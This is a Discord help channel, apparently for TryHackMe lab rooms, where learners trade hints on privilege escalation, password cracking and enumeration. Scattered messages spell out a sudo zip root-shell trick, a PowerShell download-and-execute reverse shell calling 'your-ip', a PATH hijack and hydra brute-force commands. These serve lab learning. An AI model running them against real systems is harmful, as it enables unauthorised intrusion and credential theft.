#room-hints

1 messages · Page 3 of 1

serene badger
#

never mind got it, turns out i wasnt even vpn'ed in XD

#

ok got a shell only it should give me root(i believe from the writeup) but it gave me the normal user back

#

jobs that get executed in a certain timeframe, each time

#

automated jobs to say it better

#

....

#

good question

#

am i just dumb or just not thinking too much today lol

#

will do that

#

thanks you both

jagged loom
#

What is the purpose of the quotes in THM passwordattacks room, task 4, question 2 for crunch?

crisp arch
#

Metasploit:Exploitatioin room: I get the following error when I attempt to bruteforce the smbuser password using the metasploit wordlist and user set to penny: RubySMB::Error::CommunicationError An error occured reading from the Socket no implicit conversion of nil into String

#

what does no implicit conversion of nil into String mean? 😄

#

its the last answer to task 2

steel pine
#

Hi everyone i just finished the TomGhost room.

I used this command
Dont click the spoiler if u dont want to know how to get root in that room

||TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF||

can anybody explain me how this works? why did i just got a root shell from that, and is there a way to practise this knowledge you can dm me or let it know here.

Thank you for reading.

#

will do thanks

green minnowBOT
#

Gave +1 Rep to @burnt rivet

languid isle
#

is there other website that show case how to exploit zip to get root with other way?

#

or any other binary

languid isle
#

i mean other website that can show other method

lunar wave
#

Hello everyone! I'm currently in the "Walking an Application" room and I'm stumped by the directory listing flag question. I've already done everything else in the room but that and I feel like I'm missing something very basic lol. I keep going to the website the room links to and adding "/.nav-collapse" from the page source, but I just get a page not found message on the website. Could I have a hint to point me in the right direction?

left thunder
green minnowBOT
#

Gave +1 Rep to @left thunder

pine dust
#

can anyone help me with Corridor

#

I had a little idea of what to do but it seems pointless now.

steel pine
#

|| | hey im doing the Ignite room where im tring to get root, im trying a PATH privilege escalation but for some reason it doenst work? anyone knows why? ||

cold eagle
steel pine
#

anyone that can give me a mental push, im doing ignite room and the shell i have is so bad, i have upgraded with python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm/export TERM=xterm-256color. but still linpeas wont work or nano doenst work properly.

lyric lichen
green minnowBOT
#

Gave +1 Rep to @lyric lichen

lyric lichen
left thunder
# steel pine will try thank you

Since you gained access on the machine, what about getting another rev shell from there, which you can then use to upgrade like usual ?

steel pine
trail loom
#

Room Learn Linux (web based), Task 21

rustic sphinx
#

Ok what specifically do you not understand?

#

Old one made by paras

trail loom
#

how do i check

rustic sphinx
#
This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable. 
#

What confuses you?

trail loom
#

where do i check for test1234? in what directory

#

it says permission denied in ~/ and ./

#

yes but isnt that the username?

#

so i used export to set it. and how does that bit help with finding out the password for shiba3?

#

keeps saying permission denied

proud scarabBOT
trail loom
prisma quarry
#

guys, need help, have a question on tryhackme like this "Ao enviar dados por TCP, como você chamaria os dados "pequenos"?" Alguém sabe a resposta?

prisma quarry
#

guys, need help, have a question on tryhackme like this "When sending data over TCP, what would you call the "small" data?" Anybody know?

left thunder
prisma quarry
#

room " introduction to network "

#

Assignment

left thunder
left thunder
prisma quarry
#

can i send a print?

left thunder
# prisma quarry can i send a print?

Well I would appreciate if you let me know if this is for a TryHackMe room or for an assignment ?
And if it's for a THM room, to let me have the link to the room

prisma quarry
left thunder
prisma quarry
#

There's a question missing there that I can't get right, the antepenultimate question there

left thunder
prisma quarry
#

brother, i did it, i reread everything again and paid more attention to layer 4 you mentioned and i found it bro, thank you very much, you are awesome

thin tartan
#

Need help hash lvl2 module

junior walrus
#

Flag.exe
Flag.exe
Sorry! You are still missing something. No flag for you yet. (7)
Anybody got hint for how to run this exe? If you try to run it you get that output.

trail loom
#

where am i supposed to run it? at this point im confused on what im actually doing

#

in the home directory of shiba1

#

am i supposed to be logged in as shiba2 or 1?

#

so i need to set test1234 to something?

#

thnaks it worked. but im so confused how does setting an env var allow to run a binary.

trail loom
#

so this behaves like an if statement? as in it will only show the password when a specific env var is created with a specific value?

trail loom
#

i got stuck on the shiba4 password now 😦

#

what should i do if im unable make a directory inside of home?

limpid lintel
#

im doing crack the hash room and i need a little bit of help with hashcat command ( i know how to use it a little bit ) but the thing i dont understand the most is the result from hash-analyzer ... i would be able to choose mode from that anaylzer but there are a few things that i dont understand so i cant really choose the mode for hashcat command ... i cant send ss in this channel maybe can someone dm me to help me? thank u

left thunder
#

!docs verify

proud scarabBOT
worn junco
#

Hi, I think misunderstand something about this Question in task 9. Any hint?

limpid lintel
#

i dont know what mode to use for hashcat in this case

left thunder
worn junco
#

proxy/options

Proxy Listeners
Intercept Client Requests
Intercept Server Responses
Intercept Websockets Messages
Response modification
Match and Replace
Tls Pass Through
Miscellaneous
?

right click on intercept request

scan
send to intruder/repeater/sequencer/comparer/decoder
request in browser, in original session/in current browser session
change request method / body encoding 
...
copy as curl command
don't/do intercept request
URL-encode as you type
#

I tried these, but nothing match the suggested pattern

trail loom
#

i thought this was the only one

#

are they just directories inside the home directory ?

#

there is already a test dir and test1234 file in shiba3.

humble flame
late tiger
# trail loom

Try making a file in the /tmp directory. 99/100 that’s writable

#

Or maybe you already had your question answered idk I didn’t read every response I’m sorry

trail loom
#

yes, thanks. the folders were already there. i got baited and spent too much time trying to create a dir.

green minnowBOT
#

Gave +1 Rep to @burnt rivet

worn junco
green minnowBOT
#

Gave +1 Rep to @humble flame

white salmon
#

Hello guys, im trying to run john on a file but i'm not being able to crack it. i'm using this input : "john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt", and as output im getting three lines which are: "Using default input encoding: UFT-8, Loaded 1 password hash, No password hashes left to crack" am i missing any parameter? ive done some research and this suppose to work

#

any help would be nice

#

Yes

#

yes cant find nothing

white salmon
#

ok needed to remove john.pot ty ty 🙂

violet wasp
#

Hi guys.I have been given ip: 157.90.147.52 and the challenge is to send back flag names. Does anyone know how to do it?

#

oh yeah

wise spruce
#

Hello Admin and everyone,

Please, I will be grateful if someone can help me out with the "breaching Active Directory" room. The reason is I'm trying to set up the DNS IP in the network manager settings and when I'm done with everything and i try to run the following command:

"nslookup thmdc.za.tryhackme.com"

it tells me:

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

Please, someone, help me out please, I really want to understand the Active Directory path. 🙇 🙏

lucid junco
wise spruce
#

Or did I do anything wrong?

lucid junco
trail loom
#

Common Linux Prives: task 4

#

whats the password here?

trail loom
#

which ip do i use to ssh?

#

when i hit start machine, attackbox pops up in the split view

#

i will try restart that might fix it

steel pine
#

is this a way to exploit in or is this useless information?

young dagger
#

Hi guys

#

i have a littel problem with last task ( privilege escalation) in the kenobi room

#

if i try to do

#

echo /bin/sh > curl

#

i doesnt but the /bin/sh command in a file curl

#

if i cat the curl file then

#

it just says /bin/bash

#

eh /bin/sh

topaz umbra
#

Im not entirely sure if this is what you want, but try echo '#!/bin/bash' > curl ? then add the rest of your bash script

#

*im not in the room so im not sure what the instructions are

#

or /sh instead of /bash if you want

twin creek
#

hello
room snort https://tryhackme.com/room/snort
task 3 According to the official description of the snort, what kind of NIPS is it?
I want hint for this task....

#

should I try every single word in the description...?

lucid junco
twin creek
green minnowBOT
#

Gave +1 Rep to @lucid junco

young dagger
#

hi guys im doing the alfred ctf right now

#

ive already logged into jenkins

#

now it says the following

#

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
#

are these 2 different commands?

#

1-

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1')
#

Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

#

or is that one command?

young dagger
#

like i run the command like this now

#

it downloads the file from my python http.server, but i dont receive a connection on my netcat listener

compact wren
#

Hi, in Wonderland room I find this poem. I'm not an expert in English. Should I read this poem carefully or it's just content of room ?

digital hemlock
green minnowBOT
#

Gave +1 Rep to @digital hemlock

white salmon
#

Hi, I am doing the lunizz room and i am at this point where I have to crack the password. My script runs an hour now, is this normal?

lethal flare
#

Hello i need help aha, i am on the "Intro to Digital Forensics: Task 3" . i am told to search google maps for the revealed gps coordinates and i have dont it but i cant find the correct name for the answer XD

alpine kestrel
lethal flare
#

ill double check aha

alpine kestrel
#

that is the hint from said question

#

shadow can help more if needed be

lethal flare
#

yeah, i tried it and it took me to a location however i couldn't# find the correct street name. im going to do it again aha

#

Got it aha thanks :3

alpine kestrel
#

no problem

lethal flare
#

when i did it the first time it took me to a completely different location XD but i have gotten it now. thank you! :3

wind nimbus
#

Hey everyone. Im currently working on the Enumerating FTP room in the cyber defense path. My NMAP scan of the IP seems to be taking an abnormally long time. Can anyone provide any input? Thank you!

#

I used: nmap x.x.x.x -p- -T4 and I get this warning now: Warning: x.x.x.x giving up on port because retransmission cap hit (6).

humble flame
#

do you get the same thing when not using -T4?

humble flame
wind nimbus
#

I figured it out lmao it was just a straight nmap scan.

#

nmap [ip]

#

thanks!

white salmon
#

For the Burp Suit Task 8 Bonus question:

[Bonus Question -- Optional] Try performing the capture again, but this time monitor your requests in Wireshark. Can you see why live capturing the requests for this analysis can be described as "loud"?

What would I be looking for that would stand out besides just a lot of requests? I know there is a Wireshark room and I will do that but for now I started Burp Suite and wanted to know what specifically should be standing out in a Wireshark.

arctic cypress
#

@wind nimbus you can also short that time by using :
nmap -p- -n -Pn -A [IP] ....it will be faster and most efficient

plucky pecan
#

Hey guys, i stumbled over some rooms, that require you to use RDP to connect to a vm. Is there any solution on the attack box for rdp?

white salmon
#

room: powershell
get-command and get-help are my friends, right?

plucky pecan
#

Yeah i know, meant if there is anything preinstalled, i didnt know about, so i dont have to set it up all over again everytime

white salmon
#

room/powershell was specially painful to deal with the delay in rdp 💀

muted parrot
#

weird I'd done most of the vulnet series, was going to do endgame then saw I haven't done just "vulnnet" yet haha

finite viper
#

Hey, can anyone give me a hint for the room Madeye's castle

finite viper
#

Nevermind 😎

muted parrot
mossy flax
#

I've uploaded a php resverse shell script and have gotten a shell, but how do I run bash because the shell is currently so limited, can't cat files etc

muted parrot
#

to stabilise shell

mossy flax
#

no that's what I'm missing!

#

Can you point me in the right direction?

muted parrot
#

python3 -c 'import pty;pty.spawn("/bin/bash")'

mossy flax
#

aaaah!

muted parrot
#

ctrl z stty raw -echo; fg

#

enter enter enter export TERM=xterm

mossy flax
#

Thank you!

muted parrot
#

it's a good one to memorise

#

xD

mossy flax
#

I will do now that I know it.

#

+rep @muted parrot

green minnowBOT
#

Gave +1 Rep to @muted parrot

muted parrot
#

a lot of these things are tempting to copy and paste but typing them endlessly just sticks them in. i think that and iex (new-object net.webclient).downloadstring('fffffff

mossy flax
#

I just wrote it out to try to understand the process

mossy flax
muted parrot
#

which, python3?7

#

sorry iex is the powershell command for downloading (and executing) powershell scripts

#

it's just another one I type a lot :<

mossy flax
#

hahaha okay cool

muted parrot
#

so you can host a nishang reverse shell locally, and call it remotely to execute etc.

mossy flax
#

more to learn haha

muted parrot
#

always more to learn :-s

mossy flax
#

Speaking of which, I will make myself a nice coffee

#

thanks that stabilization worked a charm

muted parrot
mossy flax
#

I see

muted parrot
#

yeah you'll have a proper shell now that you can autocomplete and control c etc.

mossy flax
#

huge help, thanks!

muted parrot
mossy flax
#

RootMe

#

Just left the final 2 questions months ago

#

and wanted to finish it

#

I think I tried to do it on day 2 of learning

mossy flax
muted parrot
#

www-data is the account that the web servers run on, but it's not an account you'll want to SSH into.

#

If you exploit some web app and pop a shell as root it usually means you're in a container 😭

#

So you use python, because it's always* on Linux, and pty is a default library, so you can use it to spawn process (bash) and control the process through your terminal

tepid trout
#

Bruh you can help me for solve machine wonderland, im stuck in user rabbit, i can't cek perl, maybe you have clue or hint? Give to me

proud scarabBOT
clever charm
#

can someone help with the question "What do you need to access a web application?" (its 7 characters).

languid isle
clever charm
#

browser

languid isle
clever charm
green minnowBOT
#

Gave +1 Rep to @languid isle

teal seal
#

Hello Can anyone help me in room bufferoverflow brainstorm

#

the first question is how many ports are open

#

i use nmap every time i get 3 ports are open

#

but answer is 6

#

how can anyone clear me

compact wren
modest orchid
#

Hi! I just need a hint for Confidential idk what tool I’m supposed to be using, any hints?

#

It would be on the provided vm

glossy perch
alpine kestrel
#

what is the exact command???

violet olive
#

need some assistance doing the john the ripper room having trouble on encrypted zip files just with the taskfiles

violet olive
#

task 9

#

files wont download locally and cant get it on the attackbox

left thunder
violet olive
#

how do you transfer ive tried with the clipboard but it doesnt copy the actual file just the text

#

yeah

left thunder
#

Then you for example could just upload the files to a file host and download them inside the attackbox

#

Or just use scp

#

Credentials can be found when pressing the info button when having the attackbox open in split view

violet olive
#

ohhh right ill give that a go thankyou brother

left thunder
#

You are welcome

alpine kestrel
#

sftp should also work if you feel that scp is to complicated

violet olive
#

looking through option of scp now lol yeah might go stfp

glossy perch
#

Can you help me with something of the password like length or first two characters so I can make a shorter list from rockyou.txt? I ran my Python script for hours. No clue where the fault is.

rustic sphinx
#

Why not use hashcat?

glossy perch
#

Can you help me with something more of the password like length or first two characters so I can make a short list from rockyou.txt? I ran my Python script for hours. No clue where the fault is.

glossy perch
# rustic sphinx Why not use hashcat?

Is that possible for this situation? Cost factor of 12, bcrypt is very cpu intensive and that is a challenge with my kali vm and rockyou wordlist is very large.

rustic sphinx
#

Try this, might give you an answer

glossy perch
rustic sphinx
glossy perch
rustic sphinx
#

Eh okay, looking at the writeups - brute forcing using the python file shouldn't take that long

young dagger
#

Hi at the Hack Park ctf

#

its says the following

#

Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
#

to brute force a http post form

#

but that isnt how hydra works right?

languid isle
fallow sedge
#

In Burp Suite Basics Task 9 it asks for an 'option in a drop-down submenu' but I don't see anything that fits the * hint in the box... I'm using the same edition I believe but I might be wrong on that one. Thoughts?

lucid junco
fallow sedge
#

nvm... I see it now... not something I had ever used or had a reason to work with until just now

#

thanks for the push @lucid junco

green minnowBOT
#

Gave +1 Rep to @lucid junco

fallow sedge
#

it's all in the do and don'ts... I had never thought about filtering what can trigger an unwanted response from a probed service

quick holly
#

Can I get a hint on the Metamorphosis room? I can't get any footholds

young gulch
#

hi, asking for a quick q regarding this:

#

i dont know what the 0x201c... string does but it seems to make a payload (?)

young gulch
#

i am stupid, thanks. i get it now 🙂

#

i guess i was doing the conversion wrong

#

but i switched over to cyberchef and i get the full payload now

patent mirage
#

Hi Hackers can you help me to answer this question?
Use the tools introduced in task 2 and provide the name of the malware associated with the IP address

#

on Pyramid Of Pain room

white salmon
#

I'm on Task 6 of Network Services room. I'm progressing ok but can't seem to do nmap scan for all ports with: nmap -p- [ip]

When I enter the command it gives:
Starting nmap 7.6

The cursor just blinks but nothing happens I've waited 40 minutes even. Am I missing something to scan all ports or is it my network?

#

Thank you @burnt rivet I can see it working now with verbosity. Yes, I tried a number for a range and got it by luck!

green minnowBOT
#

Gave +1 Rep to @burnt rivet

solar sundial
#

Hey 🙂
I am currently at room "Investigating Windows" and am stuck on the third question from the buttom i.e. "What was the extension name of the shell uploaded via the servers website?".
Can someone please give me a hint how to solve this.
I scammed the files in the TMP folder and tried to get some network logs or history but so far I couldn't find anything. All other questions I have already solved.
I am grateful for any help!

marble river
#

Hi, I'm just doing Linux Fundamentals Part 3, and I thought I wasn't dumb, but I'm a little stuck. When I am connecting to Python 3's server. I use python3 -m http.server in which I feel like I should and then the server just never connects, instead I get this screen where I can type but no commands can be used.

humble flame
young dagger
#

Can anyone give me a hint at skynet

#

room

#

so far i could log into the email with finding an anonymous smb share

#

In the email was a reset password

#

i tried that

#

to log into his smb share but it failed

cold eagle
sage cloak
#

hello yall

#

intro to cyber threat intel room

#

stuck on last one

#

any hints ?

tranquil parcel
sage cloak
#

im tringpepehands

tranquil parcel
#

there's not many software in that log

sage cloak
#

omggg im soo dumb

sage cloak
green minnowBOT
#

Gave +1 Rep to @tranquil parcel

sage cloak
#

without the and didnt work so i was like wtf ?

earnest charm
#

probably a good idea to not show the answer

sage cloak
#

Sorry

earnest charm
#

no worries, was just pointing it out

white salmon
#

hello everyone
Can you give me a little hint
Why a cant brute ssh...
I'm going through "Basic Pentesting" room
I found staff.txt in Anonymous Samba, found 2 usernames
And I've already looked that I definitely need to do this

└─$ hydra -L users -P /usr/share/wordlists/rockyou.txt ssh://10.10.65.1 

└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.65.1

But hydra cant find anything
[STATUS] 108.00 tries/min, 324 tries in 00:03h, 14344078 to do in 2213:36h, 13 active

#

Oh, it really did. Thanks)

I think it's a little silly to use such a long brute force in the room, but okay

left thunder
white salmon
#

Okay, you know better, I'm a beginner)

left thunder
limpid lintel
#

doing overpass 1 > task 1
found Golang net/http server (Go-IPFS json-rpc or InfluxDB API) by scanning with nmap and admin page | download two files (overpass.go and buildscript.sh ) cuz they were given
the hint says owasp top ten vuln so i just wanna ask do i have to read more about Go-IFPS to know more about it or is there a way to approach it ... im not sure what to do at this point

alpine kestrel
#

also explore the sites code including the javascript code

drifting flicker
#

Greetings, I would like some help, so im doing Task 13 in "What the Shell" room, but I cant figure out how can I send the shell.exe that I've created on the attack machine to the RDP windows account so I can run it and catch it using multi/handler on the attacking machine. How can I copy it to the target RDP?

drifting flicker
#

thanks

green minnowBOT
#

Gave +1 Rep to @burnt rivet

white salmon
#

how can i connect to rdp for the windows privesc path

chrome scaffold
#

hello i am stack Upload Vulnerabilities task 11 ( when i try to forward burpsuite to find /assets/js/upload.js not work )) can fix that?

chrome scaffold
sweet verge
#

I've been working on the Surfer lab. I'm able to access the console, but not sure what to do from there. I'm given a bit more info about the server and the location of the flag, but I'm not able to access the flag since I'm not internal. Anyone have any tips?

limpid sigil
sweet verge
#

I feel like I'm overthinking it. @coral grotto I saw you completed it. Any tips?

#

I'm trying to use SSRF to grab the flag, but no luck

#

Been digging through the page source to find something else

#

Yup

#

I did not think of that...

limpid sigil
#

oh my god it was right there

#

woops i spoke too soon

limpid sigil
#

got it! thanks @coral grotto

green minnowBOT
#

Gave +1 Rep to @coral grotto

left thunder
#

No hints for new challenge boxes should be given immediately after a release (72 hours, by default) #rules

tepid slate
#

Musical Stego room has a problem with the second to last question i think. It says to use a github link instead of a pastebin link because it is down but i think the github link is down aswell.

finite viper
#

Can anyone give me a hint for the room "harder"?

white salmon
#

can someone give me a hint to "tell nmap to scann all ports?"

white salmon
#

🤙

hexed jasper
#

howdy folks. I'm working on the intro to c2 room, have armitage up, connected to target machine. I have the admin's hash, but could use a hint on how to get Ted's. Is there a way to swap user?

#

hashdump is throwing up an error for me

#

ah, figured it out. Needed to migrate processes for some reason.

serene badger
#

for the b99 ctf, got the note and tried hydra on ssh with the user but rockyou doesnt seem to give anything back, any hints?

#

als my dirb scan gave no real interesting stuff

alpine kestrel
#

the sudo password is the same as the account password which you already got

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

it did work this time??? if so nice and good luck with the exploiting

#

yuup as that tends to be how sudo works

#

it uses the users password and that password tends to be the same when logging in whetever that is ssh or not

#

the exception is if it is a ssh key file

#

as those tend to just have an encryption password sometimes and that is not the users password so of course it does not work for sudo

wicked kite
#

Hello, can someone give me a hint for room "webenumerationv2" - I'm stuck on the Task6, Question5 and would appreciate some help 🙂

wicked kite
#

I found both virtual hosts from question4 and was scanning both for directories but could only find /js/ and /css/ on both

#

Well, i scanned both directories on both vhosts for -x.php,.flag,.txt - but maybe i misunderstood the hint?

#

Hmm i thought so but couldn't find any other directory no matter what i tried... i was using way more lists then mentioned in task5 but had no luck anyway

#

Yes - only there i think

#

Oh 🤦‍♂️ thank you

green minnowBOT
#

Gave +1 Rep to @burnt rivet

weak epoch
#

Good evening, I'm in room Windows Internals task 3. Its having me explore ProcMon and its asking me "What is the stack argument of the previous thread?" of notepad.exe, and the hint for the question "Listed as Thread in the event properties" I'm either misunderstanding or it is actually supposed to be the hint of the previous question

#

disregard I got it

idle vortex
earnest charm
#

then you should maybe look around on the server, there might be laying a flag 😛

idle vortex
green minnowBOT
#

Gave +1 Rep to @earnest charm

earnest charm
#

you're welcome

normal solar
#

In the nmap room what is the target machine, do choose one, or did i miss something?

left thunder
normal solar
#

I have the attackbox started, I didn't know they were they same.

left thunder
#

Attackbox is different than the target machine

normal solar
#

Ok figured it out. Thank you.

white salmon
#

Working on Network Services 2, specifically exploiting NFS and checking the permissions of the bash file. I was able to get a solution using ||sudo chmod +s bash|| and ||sudo chmod +x bash|| but I'm not getting the right permission set. My bash file has -rws--s--x whereas the prompt asks for a permission ending in -sr-x. Any idea where I went wrong?

shy glen
#

Hi i am workin on the Operating System Security. In the Practical Example of OS Security I am instructed to input ssh "sammie@MACHINE_IP" but i get "ssh: Could not resolve hostname machine_ip: Name or service not known"

#

The terminal example shows a different result with a login

left thunder
#

"MACHINE_IP" doesn't look like an IP, right 😄 ?

#

So you most likely haven't even started the target machine

shy glen
#

No IP is provided and if i use the attackbox IP the password is incorrect I have also used nmap to scan for hosts but none are alive

left thunder
#

Attackbox is not the same as the target machine

#

Target machine gets started with a green "Start Machine" button in one of the tasks

#

In your case, that button is in task 3

shy glen
#

oh... I did not realize that i had to start the target machine. Thank you so much.

white salmon
#

yes, but it didn't seem to change the permission to be ending in -sr-x

left thunder
#

Thus leading in having removed the r bit that you are missing

white salmon
#

ah, I get it

white salmon
#

Was able to execute bash despite not having the same exact perm the question asked for

left thunder
white salmon
#

Honestly, couldn't figure out why I didn't see the right permissions 😅

#

First thing my mind went to as I wasn't aware of the +x perm before

#

Unrelated, same room (Network Services 2) different question; task 9, enumerating MySQL, second question. How are we to extrapolate the password is ||password||? Looking up default login & pass is ||usr: root and no pass|| is there something I missed here?

alpine kestrel
#

probably

white salmon
left thunder
white salmon
green minnowBOT
#

Gave +1 Rep to @left thunder

serene badger
#

need some help getting john the ripper going

#

trying "john --wordlist=/usr/share/wordlists/rockyou.txt ssh.txt"

#

and its saying no password hashes loaded

left thunder
serene badger
#

a ssh private key

left thunder
#

Did you google how to crack ssh private keys that have a passphrase ?

#

As it would tell you that you have to use ssh2john first

serene badger
#

i did not, thx

left thunder
mint musk
#

hello dear gods,
anybody keen on helping me with a horiffic steganography CTF?
I've been looking for hours, but i'm completely stuck. I've been given a .jpg file, and cant find anything.
The flag format is "CTF{*}", and it should be somewhere hidden in the file i think.
The .jpg is too large to send in discord, even when zipped.

Here is the dropbox link, if anybody wants to help:
https://www.dropbox.com/s/h3pi7ow0opa6vyt/WhatDoWeDo.jpg?dl=0

left thunder
mint musk
#

Couldn’t find the right channel to put it in. If it’s the wrong one i can move the post, ofc. And yes, it is an active ctf, not one from thm tho, notably. But i thought i’d try my luck here with some smarter heads than my own.

#

Couldn’t think of any other place to ask

left thunder
mint musk
#

I might have misunderstood the question. It’s not an active CTF as in a competition, or anything like that. It’s was from a ctf internally at work, but we didn’t receive any writeups after it was done. It was kind of like a training exercise thing for security awareness month

left thunder
serene badger
#

cant get the exploit running for the steel mountain ctf

#

if it continues to act up ill just manually exploit it lol, but anyone got a guess?

left thunder
serene badger
#

well my dumb half awake brain doesnt see it

left thunder
#

Something very likely is already using port 8080 on your machine

serene badger
#

srvport needs to be 4444 then?

#

would that work with the lport also being 4444?

left thunder
serene badger
#

hmm the user.txt gives 2 non recongnized characters

mellow turret
#

Has anyone had issues in a room where they found the flags, but the answer blank wouldn't take them and/or the answers were out of order? Specifically, I'm having issues with the Jr. Pen Tester Path: Walking an Application, Task 3...the final two flags. Any help is greatly appreciated!

#

Got it...thanks!

slate kestrel
#

Evading Logging and Monitoring task 10 the binary is just stuck any nudges on that???

dusky perch
#

Hi everyone! Is there someone that can help me with theseus room? i'm stuck at trying to get to athenes...

dusky perch
#

I found a file, a raw (data?) file, but strings seems to not find anything and binwalk (-Y) sees an arm 16bit binary in it but i'm not sure because ghidra and r2 gave me no clue

dusky perch
#

feel free to contact me in private if someone want to help me

pearl rivet
#

Is there anything missing in my command as I'm waiting forever never hitting the right password hydra -l burgess -P clinic.lst 10.10.102.122 http-post-form "/login-post:username=^USER^&password=^PASS^:S=logout.php" -V -I -T 64 -f I modified the clinic.lst with the Single-Extra john rule.

left thunder
pearl rivet
left thunder
left thunder
# pearl rivet

Mh, looks about right, have you tried restarting the target machine already?

pearl rivet
green minnowBOT
#

Gave +1 Rep to @left thunder

slate kestrel
#

i tried but couldnt figure it out?

astral badger
#

"When will the crontab on the deployed instance run?" I checked the ||crontab edit||, and it shows an example of ||5 AM every week|| But the answer is only 7 characters long so what do I have to write in it if I've tried everything?

#

Okay nevermind, I didn't try the actual thing

#

but I found the answer

slate kestrel
#

just did it like 5 mins ago lol Thank You!! anyways

astral badger
#

Need hints in the last 2 questions of subdomain enumeration. I'm bruteforcing the machine but getting all errors

#

Okay disregard this one too, I got the answers after reading what errors I was getting lol .

#

Okay so I'm getting no ||usernames|| in task 2 of ||authentication bypass|| but the requests, some are errors and some are successful. I'm confused as to what I'm looking at

#

filtering the results doesn't help

white salmon
#

perhaps your syntax is wrong?

astral badger
left thunder
#

Better to use copy paste instead of typing the command yourself

#

Actually both password parameters are wrong

astral badger
green minnowBOT
#

Gave +1 Rep to @left thunder

steel pine
#

ok guys im kinda stuck im doing the Bolt CMS room where i have to find the version of the CMS, i have tried a version scan on the port the output of that is " (PHP 7.2.32-1)" i have tried to use a CMS scanner that also did not work, i also looked on the source code + burtpsuite to get anyinfo ab the version but still no results. im i thinking to difficult? anyone that can give me a tip?

steel pine
#

yes i figured it out

#

last weeks i have some problems with my dirbuster

#

its extremly slow

thin barn
#

can i get a hint on the Zeno room?

Ran sqlmap and dumped a lot of stuff but that did not seem to be helpful

ran nmap and gobuster ... still nothing

did manual sql injection without any luck

dusky perch
#

Hi, I really want to get the fourth flag of theseus room, I spent half day to get the first three flags and in a week I was not able to get the last one, if someone made it, could he give me a hint? even in private.
All makes me think that is all about that incomprehensible (to me at least) a * * * * *e file but everything I tried (ghidra, r2, strings, xxd, binwalk and various text conversions) did not help at all...

cold eagle
safe cape
#

task 4 exploiting SMB, after entering "get "Work From Home Information.txt" I enter cat "Work From Home Information.txt" but keep getting command not found.

proud scarabBOT
cold eagle
lucid junco
serene badger
#

doing the blue room as i still havent done it. now i remember again why

#

exploit hits a wall at triggering free at corrupted buffer and fails

#

and yes RHOSTS is set correctly

#

if it still doesnt work ill just try manual exploitation instead

lucid junco
#

Your LHOST is wrong.

lucid junco
serene badger
#

damnit

#

why do i always oversee just everything but 1 thing

#

thank you mate

lucid junco
#

It's OK, it's a common thing people get wrong, I don't think the room mentions it.

white salmon
green minnowBOT
#

Gave +1 Rep to @cold eagle

safe cape
#

When doing the "exploiting telnet" task. Am I suppose to be doing the active machine ip in red? Cause that 1 keeps coming up "no routes found"

white salmon
#

even "ip" is supposed to be typed out. it's not actually asking for an ip

white salmon
green minnowBOT
#

Gave +1 Rep to @wicked mirage

white salmon
safe cape
white salmon
proud scarabBOT
#
DarkStar7471
*ahem* Can help you?
rustic sphinx
#

Dammit.

serene badger
pure thistle
#

on the new Benign room where are the splunk logs located at ?

teal narwhal
tardy glen
#

hi this might be a dumb question but how do i connect to the benign room's machine? connect via rdp?

tardy glen
pure thistle
#

just go to the machine ip in a web browser and it will launch a splunk

tardy glen
#

lemme try again

tardy glen
#

it worked ty!

tardy glen
#

just finished it. this one was pretty coool

maiden heron
#

Does anyone know a command that can be used for listing open ports that is not netstat, lsof, or ss and would fit into this answer format: ****** **********? I've been searching for a solution for ages now.

maiden heron
lucid junco
#

Oh, that one.

#

The answer is in the task.

maiden heron
#

Hmm oke

maiden heron
green minnowBOT
#

Gave +1 Rep to @lucid junco

maiden heron
#

Figured it out 👍

exotic flare
#

hi guys

#

can any one help with room RazorBlack

river depot
#

Has anyone got any Tips on the Steel mountain room? I'm having issue replacing the service due to permissions

pure thistle
trim haven
#

@dusky perch Please don't post massive text walls

safe cape
#

Why am I not able to post pics?

umbral umbra
#

You haven't verified your THM account with the bot

#

!docs verify

proud scarabBOT
safe cape
#

There's no bot on the top right of my pagr

#

This is ridiculous just to get help. Where am I suppose to find this token crap? I shouldn't need to go through all this just to get help

umbral umbra
#

I see the bot. It should be just under the discord admin group.

safe cape
#

I messaged the bot and got some b.s response about a token. I don't use discord. I have no idea what it's talking about a token. But there's no token where that bot said it would be. Idk why I can have a link sent or something normal to be verified. I can't even post a pic showing what I'm talking about

#

This shits broken. I send everything it asked and it still says it can't verify.
I need to get these tasks done so who can inbox me so I screen screen shot my issue.????

safe cape
#

Nvm. The fb group helped.

steady stratus
steady stratus
wise osprey
serene badger
#

active directory basics room doesnt give me a password or anything to login with

#

only username

lucid junco
#

Can you link?

lucid junco
serene badger
#

....

#

imma facepalm myself real quick

#

jesus this takes the cake

lucid junco
#

😂

toxic depot
#

Hi, I'm looking for a nudge for Benign. I'm on question 9 of Task 2 and I know the suspicious file, but I don't know how to look at it to find the pattern.

trim haven
toxic depot
green minnowBOT
#

Gave +1 Rep to @trim haven

frail ibex
#

Look for bak

toxic depot
frozen compass
pure thistle
#

Any hint on how to find the imposter?

toxic depot
toxic depot
toxic depot
pure thistle
shut forge
#

any nudges on the The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?

#

for splunk challenge 1

#

im seeing the before and after events of the downloaded file but cant correlate to get the answer

clever charm
#

ok guys and gals I'm stuck on Walking an Application Task 3 Question 3 and 4. I tried using /Assets + https://10-10-115-124.p.thmlabs.com/, since that's the directly listing in the page source code. But that's not it. Any hints or help I would greatly appreciate it.

austere abyss
#

n

winter yoke
#

e

signal briar
#

I am getting 'GLIBC_2.34'not found I checked my code many times and also I am doing everything correct then also

#

I am always getting this error

night garden
#

I'm stuck finding the first answer for
